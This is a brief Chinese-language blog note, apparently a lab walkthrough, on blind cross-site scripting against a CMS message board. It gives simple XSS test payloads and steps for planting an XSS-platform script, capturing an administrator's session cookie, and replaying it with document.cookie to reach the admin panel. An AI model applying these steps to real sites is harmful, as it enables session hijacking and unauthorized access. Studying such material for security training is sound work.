xss盲打
# 搜索框中搜索
<script>alert(/xss/)</script>
<script>confirm(/xss/);</script>
<script>confirm('xss');</script>
<script>prompt('xss');</script>
固定会话攻击
进入xss平台创建项目
项目配置完成后打开项目代码
将代码插入到可能存在xss漏洞的位置,进行留言,将代码插入到留言板
等待管理员查看
回到xss平台查看cookie信息
将获取到的cookie写入浏览器
cookie :
username=admin;
userid=1;
PHPSESSID=4nlh6i2au2qpufav4qh5triel0
将得到的cookie输入到浏览器中,即可进入后台
document.cookie="username=admin";
document.cookie="userid=1";
document.cookie="PHPSESSID=4nlh6i2au2qpufav4qh5triel0";
然后直接访问10.4.7.130/cms/admin/
进入成功
标签:XSS,xss,admin,userid,cookie,document,0628 From: https://www.cnblogs.com/W-xzg/p/17514717.html